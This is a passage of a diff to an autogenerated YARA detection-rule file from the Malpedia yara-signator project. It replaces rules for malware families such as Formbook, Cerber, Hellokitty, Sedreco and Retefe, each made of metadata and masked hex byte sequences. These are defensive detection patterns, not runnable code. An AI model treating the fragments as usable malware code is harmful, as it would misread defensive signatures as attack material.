-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkdew"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.darkdew_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.formbook_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "b05f670c23077615e6a702bdb8387206cc612d9856e8283c4dc5f994c8c7e0fc"
+		logic_hash = "3380fbe26c3100d3b724659437582cb2b4b97057755a8459118372ab9a826cc2"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -131908,32 +132430,71 @@ rule MALPEDIA_Win_Darkdew_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85db 7467 8b8d30ffffff b80f78fce1 2bcb f7e9 03d1 }
-		$sequence_1 = { 8b4d18 2bc1 6a03 68???????? 83f803 7221 83fa10 }
-		$sequence_2 = { 03d6 c1fa09 8bf2 c1ee1f 03f2 f7e9 }
-		$sequence_3 = { 8dbd2ce0ffff 81ea44020000 b991000000 8bf3 8955fc }
-		$sequence_4 = { 75f9 8b5d98 2bca 8b5594 }
-		$sequence_5 = { e8???????? 83c40c eb02 2bf3 81ef44020000 }
-		$sequence_6 = { 8b4704 2bc6 50 8b45fc 0544020000 56 }
-		$sequence_7 = { 8b00 89853cfeffff b914060000 8d8534feffff }
-		$sequence_8 = { 837c241402 0f8c0c010000 81c7bcfdffff 897c2410 0f1f00 b80f78fce1 f7ee }
-		$sequence_9 = { f3a5 8b4de8 894dfc eb03 8b45f4 }
+		$sequence_0 = { 55 8bec 8b4508 8b480c 56 6a05 51 }
+		$sequence_1 = { c3 6a01 8d8d00fcffff 6a0a 51 e8???????? }
+		$sequence_2 = { 8db4089979825a 8b4df8 8b45fc c1ca02 8bd9 8955fc 8975f8 }
+		$sequence_3 = { 8d8d4cfdffff 51 52 56 e8???????? 83c424 85c0 }
+		$sequence_4 = { c785dcfeffff74005600 c785e0feffff65007200 c785e4feffff73006900 c785e8feffff6f006e00 }
+		$sequence_5 = { 0faf4ef8 83c6ec 83c002 0faf4608 83c014 3bc1 }
+		$sequence_6 = { 8b4510 8955d0 2b4134 83c408 8945cc 8b89a0000000 03cb }
+		$sequence_7 = { 33c0 81ff00000040 0f94c0 5e 5f 5b 8be5 }
+		$sequence_8 = { 898579ffffff 89857dffffff 894581 894585 894589 6689458d 88458f }
+		$sequence_9 = { 8b07 83c414 0345f8 5f 5e 5b }
 
 	condition:
-		7 of them and filesize < 279552
+		7 of them and filesize < 371712
 }
-rule MALPEDIA_Win_Vsingle_Auto : FILE
+rule MALPEDIA_Win_Blister_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "cc9fe25a-3024-59d5-8bbd-cc483f35b4a0"
+		id = "75a4d5c1-fad1-5de9-baeb-706545e990e7"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vsingle"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.vsingle_auto.yar#L1-L166"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blister"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.blister_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "ea6b709a9def94eb8d7fd51d94ddf5ae4235a8cf02f9fd365b88bc3b6358449b"
+		logic_hash = "cf8a8615a4d489a259d535fb620f06fe5362163915633c0aacc9d77eb620d2b5"
+		score = 60
+		quality = 25
+		tags = "FILE"
+		version = "1"
+		tool = "yara-signator v0.6.0"
+		signator_config = "callsandjumps;datarefs;binvalue"
+		malpedia_rule_date = "20241030"
+		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
+		malpedia_version = "20241030"
+		malpedia_license = "CC BY-SA 4.0"
+		malpedia_sharing = "TLP:WHITE"
+
+	strings:
+		$sequence_0 = { c745e8ca000000 c745f0cb000000 e8???????? 83c41c 3bc6 7414 ff7308 }
+		$sequence_1 = { e8???????? 8d45fc 50 8bcf e8???????? 85c0 7ce2 }
+		$sequence_2 = { 8bc8 e8???????? 8bd8 85db 0f8ca5000000 6a04 e8???????? }
+		$sequence_3 = { c1e910 33d2 663bd1 7513 52 52 e8???????? }
+		$sequence_4 = { 83f901 7f40 57 e8???????? 03de 33c9 6a02 }
+		$sequence_5 = { ff45f4 8b45f4 83c70c 3b45f8 72e3 eb07 c745ec01000000 }
+		$sequence_6 = { 7568 8bce e8???????? ebd6 ff7508 8bce }
+		$sequence_7 = { 85f6 7c7a 8b8df0ddffff 57 e8???????? 8bf0 85f6 }
+		$sequence_8 = { 56 ff10 8bf8 85ff 7409 6a01 }
+		$sequence_9 = { 59 894604 85c0 7503 895dfc 33ff 397dfc }
+
+	condition:
+		7 of them and filesize < 1822720
+}
+rule MALPEDIA_Win_Cerber_Auto : FILE
+{
+	meta:
+		description = "autogenerated rule brought to you by yara-signator"
+		author = "Felix Bilstein - yara-signator at cocacoding dot com"
+		id = "8ad318b2-fd4e-5d92-a12e-9e1971af4667"
+		date = "2024-10-31"
+		modified = "2024-11-11"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cerber"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cerber_auto.yar#L1-L103"
+		license_url = "N/A"
+		logic_hash = "ae8e4dedfae2653bfc99d378ae78948f80a8248c771063fd5aaf09788296968e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -131947,79 +132508,112 @@ rule MALPEDIA_Win_Vsingle_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 66898568fdffff 8d8d6cfdffff 51 0fb79568fdffff }
-		$sequence_1 = { 668955f8 b801000000 6bc800 8a540de8 }
-		$sequence_2 = { 83c204 8955fc 8b45f8 0345fc 8b4d10 8908 8b55fc }
-		$sequence_3 = { 668955f9 8855fb c785d4fbffff07020000 8d85d4fbffff }
-		$sequence_4 = { 668955f8 c745f46c4e078e 8b450c 8945fc }
-		$sequence_5 = { 8a540de8 8815???????? b801000000 c1e000 8a4c05e8 880d???????? 8d55ea }
-		$sequence_6 = { 8a5415f8 88540df8 b801000000 d1e0 b901000000 c1e100 8a5405f8 }
-		$sequence_7 = { 668955ee c745f000000000 b810000000 668945f8 c745f4f756bd64 eb20 }
-		$sequence_8 = { 81e90ccf1926 394dfc 59 7505 e9???????? 50 }
-		$sequence_9 = { 81f7e7c25008 81c7892b0bc9 81c748a095dd eb11 }
-		$sequence_10 = { 51 b9a251215b 81c1ea838beb 81f149ac3b55 }
-		$sequence_11 = { 51 b91604ec6b e9???????? 81f097f6a505 81f057a7f1cc }
-		$sequence_12 = { 885da0 eb21 81eaf7fb4a93 81f21bea8dcb 81c25444399b }
-		$sequence_13 = { 81f1367858fe 81f12158256c 894c2404 59 ff15???????? }
-		$sequence_14 = { 50 b89da54c19 81c01ab7de15 81f05c64d929 81f0714ef44c }
-		$sequence_15 = { 81c3af0f8c7e e9???????? 81c3ea117171 81c36738f462 81c315173337 81c3beb17872 81eb4b94fb51 }
+		$sequence_0 = { ff36 ff15???????? 899e14010000 eb06 }
+		$sequence_1 = { 85c9 7435 8b550c 8d3c8a 8b4d08 2bca 894df4 }
+		$sequence_2 = { 8b7d10 eb04 83248b00 85c9 }
+		$sequence_3 = { 85c0 7427 52 e8???????? 59 85c0 }
+		$sequence_4 = { 7c28 8bc1 3bc1 7522 8b8cc3f03b0000 }
+		$sequence_5 = { 3b8374010000 7e06 898374010000 ff7510 50 53 e8???????? }
+		$sequence_6 = { d3ee 85c9 7414 ff7514 51 ff7508 }
+		$sequence_7 = { 8b5d08 8bc3 c1e002 50 ff750c e8???????? }
 
 	condition:
-		7 of them and filesize < 940032
+		7 of them and filesize < 573440
 }
-rule MALPEDIA_Win_Narilam_Auto : FILE
+rule MALPEDIA_Win_Sedreco_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "da9d4048-8edf-5bad-820f-4e60bf8a1167"
-		date = "2023-12-06"
-		modified = "2023-12-08"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.narilam"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.narilam_auto.yar#L1-L134"
+		id = "79578107-84f9-5f01-8bf1-070f071e75ff"
+		date = "2024-10-31"
+		modified = "2024-11-11"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sedreco"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sedreco_auto.yar#L1-L450"
 		license_url = "N/A"
-		logic_hash = "9c97c97f1983ca4888bd0ceffb3db6cc9301c52fb6e7adafbcc7af03cf7073fe"
+		logic_hash = "79e378080daf9957ad7b702ae6910bfba39dd77a995aedb850c5514668bb56cb"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20231130"
-		malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351"
-		malpedia_version = "20230808"
+		malpedia_rule_date = "20241030"
+		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
+		malpedia_version = "20241030"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? f645f801 7518 8d55f4 a1???????? e8???????? 8b45f4 }
-		$sequence_1 = { 8d8550ffffff ba02000000 e8???????? 66c785dcfeffffe801 ba???????? 8d854cffffff e8???????? }
-		$sequence_2 = { e8???????? 8b55fc 8bc6 e8???????? 8bf8 e9???????? 8d5308 }
-		$sequence_3 = { eb83 e9???????? 66b86801 ebf5 66b86901 ebef 66b86a01 }
-		$sequence_4 = { e8???????? eb08 8b45fc e8???????? 33c0 5a 59 }
-		$sequence_5 = { e8???????? c3 3a90e2020000 740b 8890e2020000 e8???????? c3 }
-		$sequence_6 = { e8???????? 8bc8 8bd3 8b831c020000 ff9318020000 33c0 8a45ff }
-		$sequence_7 = { a5 a5 a5 8d4584 8d4dd4 ba04000000 e8???????? }
-		$sequence_8 = { ff852cffffff 8d5588 8d45fc e8???????? ff8d2cffffff 8d4588 ba02000000 }
-		$sequence_9 = { 8d8580feffff e8???????? ff854cfeffff 8d9580feffff 8d45fc e8???????? ff8d4cfeffff }
+		$sequence_0 = { e8???????? 89450c 56 85c0 }
+		$sequence_1 = { 8bec 51 836d0804 53 56 }
+		$sequence_2 = { c645ff30 e8???????? 85c0 7505 }
+		$sequence_3 = { 8b750c 56 e8???????? 6a08 }
+		$sequence_4 = { 50 68???????? 6a0d 68???????? }
+		$sequence_5 = { 51 6802020000 68???????? 50 }
+		$sequence_6 = { 7ce0 a1???????? 5e 85c0 }
+		$sequence_7 = { 7411 6a04 68???????? 68???????? }
+		$sequence_8 = { ffd6 8b0d???????? 894170 85c0 }
+		$sequence_9 = { ff15???????? 83c604 81fe???????? 7ce0 a1???????? }
+		$sequence_10 = { e8???????? 83c40c b8f6eeeeee 8b4df0 64890d00000000 }
+		$sequence_11 = { ffd6 8b0d???????? 898180000000 85c0 }
+		$sequence_12 = { 56 be???????? 8b06 85c0 740f 50 }
+		$sequence_13 = { ffd0 c745fcfeffffff e8???????? 33c0 }
+		$sequence_14 = { 6a01 68???????? ff35???????? ff15???????? ffd0 }
+		$sequence_15 = { 68???????? 6a00 6a00 ffd6 50 68???????? 6aff }
+		$sequence_16 = { 8b35???????? 83c404 6a00 68???????? 6aff 68???????? 6a00 }
+		$sequence_17 = { 6800010000 6a00 68???????? e8???????? 6800020000 }
+		$sequence_18 = { 488b15???????? 48c7c101000080 488b05???????? ff9038010000 }
+		$sequence_19 = { 4533c9 4533c0 ba00000080 488b0d???????? 488b05???????? }
+		$sequence_20 = { 488b0d???????? 488b05???????? ff5010 85c0 }
+		$sequence_21 = { 488b05???????? ff9040010000 90 4883c430 }
+		$sequence_22 = { 488b05???????? ff90e8000000 488b0d???????? 488b05???????? ff5028 48c705????????00000000 }
+		$sequence_23 = { 68???????? e8???????? 8b35???????? 83c404 6a00 }
+		$sequence_24 = { 4889442420 41b906000200 4533c0 488b15???????? 48c7c101000080 }
+		$sequence_25 = { 4883c428 c3 48890d???????? c3 48895c2410 }
+		$sequence_26 = { 488b05???????? ff90e8000000 ba10270000 488b0d???????? }
+		$sequence_27 = { 7cd5 68???????? e8???????? 8b4dfc }
+		$sequence_28 = { 6a00 ffd6 8b4dfc 5f 5e 33cd b8???????? }
+		$sequence_29 = { 53 68???????? ff35???????? ffd6 ffd0 85c0 }
+		$sequence_30 = { c20c00 6a02 ff74240c ff74240c e8???????? c20800 ff74240c }
+		$sequence_31 = { 8d55f8 52 50 8b08 ff5124 }
+		$sequence_32 = { e8???????? 8d0c36 51 50 68???????? e8???????? }
+		$sequence_33 = { 52 50 ff91f0000000 8bf0 }
+		$sequence_34 = { 33cc e8???????? 8be5 5d c3 e8???????? a1???????? }
+		$sequence_35 = { 6aff 50 6a00 6a00 ff15???????? 5e }
+		$sequence_36 = { 53 56 57 c745dce197af54 }
+		$sequence_37 = { 8b85ecfeffff 8b4df4 64890d00000000 5f 5e }
+		$sequence_38 = { 741f 6a07 68???????? e8???????? 85c0 7402 }
+		$sequence_39 = { 50 ff512c 8bf0 f7de 1bf6 }
+		$sequence_40 = { 57 894df0 ff15???????? 8945fc 8b45f0 8945f4 8b45f4 }
+		$sequence_41 = { 57 50 ff512c 8bce 8bd8 e8???????? 57 }
+		$sequence_42 = { 8b06 50 8b08 ff9180000000 8b06 }
+		$sequence_43 = { c644043c00 8854242c ff15???????? 8d7c2438 83c9ff }
+		$sequence_44 = { 7640 3bdf 753c 8b742448 a1???????? 85f6 7402 }
+		$sequence_45 = { f3aa 8a5c2411 8a442410 8ad3 }
+		$sequence_46 = { 740d 3cff 7409 fec8 8841ff b001 eb65 }
+		$sequence_47 = { 52 e8???????? 8d4624 8d4c2418 }
+		$sequence_48 = { 8b8c247c080000 e8???????? b907010000 33c0 8dbc243c040000 c7842464080000ffffffff f3ab }
+		$sequence_49 = { 741d 8b542428 8b44242c 0fbecb 03c2 8ae9 }
+		$sequence_50 = { 8915???????? 83fbfd 8935???????? 763b ff15???????? }
 
 	condition:
-		7 of them and filesize < 3325952
+		7 of them and filesize < 1586176
 }
-rule MALPEDIA_Win_Kronos_Auto : FILE
+rule MALPEDIA_Win_Retefe_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a0b4b62f-a866-556e-9f95-bc6e89d12770"
+		id = "db079941-ad88-585f-9381-dc621d03f57c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kronos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.kronos_auto.yar#L1-L101"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.retefe"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.retefe_auto.yar#L1-L261"
 		license_url = "N/A"
-		logic_hash = "47204f1b85469eed91b1a8f9ff5dd1693684b7472dfd0cf1125143da1fd8fdea"
+		logic_hash = "10f5fe00ae8dec2b9fe4c64e3188b2157517c220142d93e2bb2a9654bee449af"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -132031,30 +132625,51 @@ rule MALPEDIA_Win_Kronos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0fb706 8bd8 81e300f00000 81fb00300000 750e 8b5d08 }
-		$sequence_1 = { 0fb70c46 66ff444da4 8d4c4da4 40 }
-		$sequence_2 = { 0fb709 66394808 7417 8b00 }
-		$sequence_3 = { 50 8d85d8fdffff 50 e8???????? 59 59 a3???????? }
-		$sequence_4 = { 33db 897dfc 897df8 897df0 897df4 397d08 0f84a7000000 }
-		$sequence_5 = { 33db 8d443818 663b4f06 0f8395000000 56 }
-		$sequence_6 = { 0fb70c51 8b3488 8d45e0 50 }
-		$sequence_7 = { 50 8d85d8fdffff 6803010000 50 e8???????? 83c418 }
+		$sequence_0 = { 6a00 6a01 ff15???????? 8bf0 85f6 7410 6a09 }
+		$sequence_1 = { 51 8bf8 ffd6 85c0 }
+		$sequence_2 = { 68f5000000 50 ff15???????? b801000000 }
+		$sequence_3 = { 8bec 83ec08 807e0800 7555 }
+		$sequence_4 = { 894604 83c404 8bc6 e8???????? }
+		$sequence_5 = { 6a3c 6ad0 6a07 e8???????? 83c41c }
+		$sequence_6 = { 6a79 6ac1 6aec 6a40 6a79 }
+		$sequence_7 = { e8???????? 6a08 e8???????? 894604 }
+		$sequence_8 = { e8???????? 8b4e04 8901 8b4e04 }
+		$sequence_9 = { 8901 8b4e04 33c0 83c404 }
+		$sequence_10 = { 6a52 6af1 6a72 6a8a 6a3f 6a8e }
+		$sequence_11 = { 6a80 6a18 6aee 6a71 6ac7 }
+		$sequence_12 = { 8b4e04 40 3b4104 72ec }
+		$sequence_13 = { 8a0485911c4300 8803 0fb6c5 8a0485911c4300 884301 }
+		$sequence_14 = { 50 e8???????? 53 8d8504ccffff }
+		$sequence_15 = { e8???????? 68???????? 8d4508 897508 50 }
+		$sequence_16 = { 83f836 0f8f80000000 7477 83e816 83f80a }
+		$sequence_17 = { 8b06 56 ff5008 ff15???????? 33c0 }
+		$sequence_18 = { e8???????? 83c408 8906 8bce e8???????? c745fcffffffff }
+		$sequence_19 = { 50 8d8424f8010000 50 ffb42414030000 ffb42414030000 }
+		$sequence_20 = { 660fd60f 8d7f08 8b048d043f4000 ffe0 f7c703000000 }
+		$sequence_21 = { 8b45d4 886de5 8b1485a0bf4200 8a4c1a2d f6c104 7419 }
+		$sequence_22 = { ff15???????? 85c0 7814 57 68???????? 6a17 }
+		$sequence_23 = { c1fb06 83e03f 6bd030 895de4 8b049da0bf4200 }
+		$sequence_24 = { c645f800 8d4847 304c05e4 40 83f814 72f3 8d45e4 }
+		$sequence_25 = { 0f2805???????? 33c0 0f1145e4 c745f42331373d }
+		$sequence_26 = { 50 8d8dd0efffff e8???????? 56 }
+		$sequence_27 = { 8d8dd0efffff 8bd8 e8???????? 8d73fc }
+		$sequence_28 = { 6a2c 8d44244c 56 50 }
 
 	condition:
-		7 of them and filesize < 1302528
+		7 of them and filesize < 843776
 }
-rule MALPEDIA_Win_Blackcat_Auto : FILE
+rule MALPEDIA_Win_Hellokitty_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "96a105c9-de9b-58fc-9332-46741d0ee4b6"
+		id = "85d82fef-e1ef-5538-a8ca-f2e16ab22789"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackcat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.blackcat_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hellokitty"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hellokitty_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "ca17c8ec53cce7ae9541a2b17fcd5b20eeda404acb33b9d6489549a59a5a4868"
+		logic_hash = "fc4ce366fe91b18117b1ec99ae5affdf6560b9a7558856d80c31c8511e65fec9"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -132068,32 +132683,32 @@ rule MALPEDIA_Win_Blackcat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ffd0 eb09 8d45f8 50 }
-		$sequence_1 = { f20f10459c f20f104da4 8b4df0 8d045b 8d14f500000000 8945e4 8d1452 }
-		$sequence_2 = { 84c0 0f858b010000 8d4704 31db }
-		$sequence_3 = { 89c1 a3???????? ffd1 8b0d???????? 89c6 85c9 751f }
-		$sequence_4 = { 8d441601 29d7 8901 8945d4 897904 0f8486000000 }
-		$sequence_5 = { 0f8765ffffff 8b45e4 01d8 ff75ec ff75dc 50 e8???????? }
-		$sequence_6 = { 895ddc 8b5dec 8b75e0 8b4df0 89d8 }
-		$sequence_7 = { 6820010000 68???????? 6a28 eb23 81f900000200 7326 }
-		$sequence_8 = { 29d9 39f9 721a 01d8 57 52 50 }
-		$sequence_9 = { 56 83ec10 89ce 8b4a04 }
+		$sequence_0 = { 8b45c8 0bf1 3345dc 33de 2345d0 33fa 3345c8 }
+		$sequence_1 = { 66d3e0 0fb7c0 0bf0 8875fe 84f6 0f856effffff }
+		$sequence_2 = { 8bcb c1c90b 33c8 8975c4 8bc3 89b560ffffff }
+		$sequence_3 = { 03f3 8b5df4 33d0 8bc1 03de c1c802 33d0 }
+		$sequence_4 = { c1c802 33d0 8b75b8 8bc1 03da c1c807 8bd1 }
+		$sequence_5 = { 894df8 894de0 8955f4 0fb688303b4200 8b45e8 c1e818 0fb680303b4200 }
+		$sequence_6 = { 50 56 8d4dd8 e8???????? 8b5de0 8b75dc }
+		$sequence_7 = { 8988a4000000 0fb6c9 0fb699303b4200 0fb688a7000000 c1e308 0fb689303b4200 33d9 }
+		$sequence_8 = { ffd3 68???????? 8945e4 ffd3 8b55f8 8d75f0 56 }
+		$sequence_9 = { 33d2 6689544802 eb11 6a28 c645fc00 ff75fc }
 
 	condition:
-		7 of them and filesize < 29981696
+		7 of them and filesize < 319488
 }
-rule MALPEDIA_Win_Mongall_Auto : FILE
+rule MALPEDIA_Win_Flagpro_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1879a42c-8126-5974-b63b-7f69fc5f6e38"
+		id = "de33fb8c-8ab6-5256-a88a-80e461ec2d83"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mongall"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mongall_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.flagpro"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.flagpro_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "36dcbe2d37d6f65dbb3669c0b2ac6fd765ed6dc11c02d84fddc280c31d04ea56"
+		logic_hash = "654c55cf6ed0a2b532ad215de02e3b03b4d1dd22a33c5bbcc5cdd9807575a5d9"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -132107,32 +132722,32 @@ rule MALPEDIA_Win_Mongall_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85ff 7e2a 6a20 4e e8???????? 59 }
-		$sequence_1 = { 5e 0fb6c3 5b c9 c3 8bff }
-		$sequence_2 = { c785d0fdffff01000000 8bbdc8fdffff 2bbde0fdffff 2bbdd0fdffff a80c }
-		$sequence_3 = { 56 ff15???????? 8bd8 53 53 6a00 }
-		$sequence_4 = { 2bc2 8bd0 8bc7 8d5801 8a08 }
-		$sequence_5 = { c70694000000 ff15???????? 8b4604 83f804 7519 68???????? 57 }
-		$sequence_6 = { 03c9 03c9 d3e7 33c0 8975f8 }
-		$sequence_7 = { 57 8d3c40 33c9 b03d 33db 897dfc }
-		$sequence_8 = { 6a00 ff15???????? 8bf0 ff15???????? 3db7000000 7524 }
-		$sequence_9 = { 8975f8 ff15???????? 8b5d08 85db 740a 57 }
+		$sequence_0 = { 8bc3 55 8d2c3f 55 68???????? 8d1409 52 }
+		$sequence_1 = { 89b42494000000 899c2490000000 889c2480000000 39ac24b0000000 7210 8b94249c000000 }
+		$sequence_2 = { 396c2458 720d 8b4c2444 51 e8???????? 83c404 895c2458 }
+		$sequence_3 = { 33d2 c68424984501000f 83bc241c01000010 c744245807000000 c744245400000000 6689542444 }
+		$sequence_4 = { 895c2474 89742470 c644246000 396c2458 720d 8b4c2444 }
+		$sequence_5 = { 803c083d 0f8470010000 3b4b14 7609 }
+		$sequence_6 = { eb02 8bc5 8b6c2424 c6043800 45 83fd03 896c2424 }
+		$sequence_7 = { e9???????? 8b542408 8d8274bafeff 8b8a70bafeff }
+		$sequence_8 = { 8b44241c 8d542434 895c2434 8b08 52 50 8b4148 }
+		$sequence_9 = { 83c404 51 e8???????? 83ec18 }
 
 	condition:
-		7 of them and filesize < 199680
+		7 of them and filesize < 1411072
 }
-rule MALPEDIA_Elf_Nosedive_Auto : FILE
+rule MALPEDIA_Win_Amtsol_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "455c512f-a4d2-5592-873b-6a0f8d7aa60b"
+		id = "d1d86fa3-9623-55ab-a209-71141f53945c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/elf.nosedive"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/elf.nosedive_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.amtsol"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.amtsol_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "437edcb731a71f57346014b7f168c5a7e19b62836d7ab5266e2b058730d6e731"
+		logic_hash = "0a770dc5a932b1002072b79c5d73e29f3137e050ecc56387df95b6b6024c1535"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -132146,32 +132761,32 @@ rule MALPEDIA_Elf_Nosedive_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { a801 0f84d1000000 48c7c098ffffff 64448b30 64c70000000000 41ffc7 7441 }
-		$sequence_1 = { eb02 31c9 488b4038 4c89542428 48890c24 4889c7 4889442418 }
-		$sequence_2 = { 895d10 48894508 85db 0f8e81000000 4531ff 0f1f00 4489fe }
-		$sequence_3 = { 85c0 0f8fb2030000 4c8da3be000000 4c89e7 e8???????? 85c0 0f8f7b030000 }
-		$sequence_4 = { 894f78 898740010000 f3410f6f01 0f118744010000 f3410f6f4910 0f118f54010000 f3410f6f5120 }
-		$sequence_5 = { 4531c0 4c8b4c2418 488b742410 49bfffffffffffff0000 4c89cb 4d89cd 4d21cf }
-		$sequence_6 = { e8???????? 4d89e1 4189d8 4c89e2 4889c1 4889ee 4c89f7 }
-		$sequence_7 = { 880f c3 8b4c16fc 8b36 894c17fc 8937 c3 }
-		$sequence_8 = { a801 7527 488b8790000000 48837f6800 48890424 7415 488b0424 }
-		$sequence_9 = { b902160000 e9???????? 4c8d052df80e00 b9f7150000 be01000000 488d156cf30e00 e8???????? }
+		$sequence_0 = { 8d85e8fbffff 50 e8???????? 83c40c 6a10 5f 3bc7 }
+		$sequence_1 = { 8dbe54030000 8bcf e8???????? 8d8e8c030000 }
+		$sequence_2 = { ff75f0 e8???????? 59 395df4 7409 ff75f4 e8???????? }
+		$sequence_3 = { 83c40c 8946e8 85c0 752b 015d0c 47 3b7df8 }
+		$sequence_4 = { 8bd8 035df0 8b45f0 33c3 2345f8 6a14 3345f0 }
+		$sequence_5 = { 8b757c 8b8580000000 8945dc 33db 895de4 895dd8 33ff }
+		$sequence_6 = { 57 e8???????? 59 59 85c0 740d 8bf8 }
+		$sequence_7 = { 837d0800 53 56 8bf1 0f84aa000000 8b5d0c 85db }
+		$sequence_8 = { 50 8d459c 50 68???????? e8???????? 83c414 3bc3 }
+		$sequence_9 = { 85c0 7428 837dfc00 7413 0fb745f8 50 ff75fc }
 
 	condition:
-		7 of them and filesize < 3268608
+		7 of them and filesize < 335872
 }
-rule MALPEDIA_Win_Quickmute_Auto : FILE
+rule MALPEDIA_Win_Morto_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9346c7aa-034b-5306-98dc-f15f081cecb5"
+		id = "9daa15ad-04bd-517d-96ea-e01678db73e5"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.quickmute"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.quickmute_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.morto"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.morto_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "d5f635b1bfde0d275999edc49a14531f110db04930e1d0cd71d09b7e6594ac87"
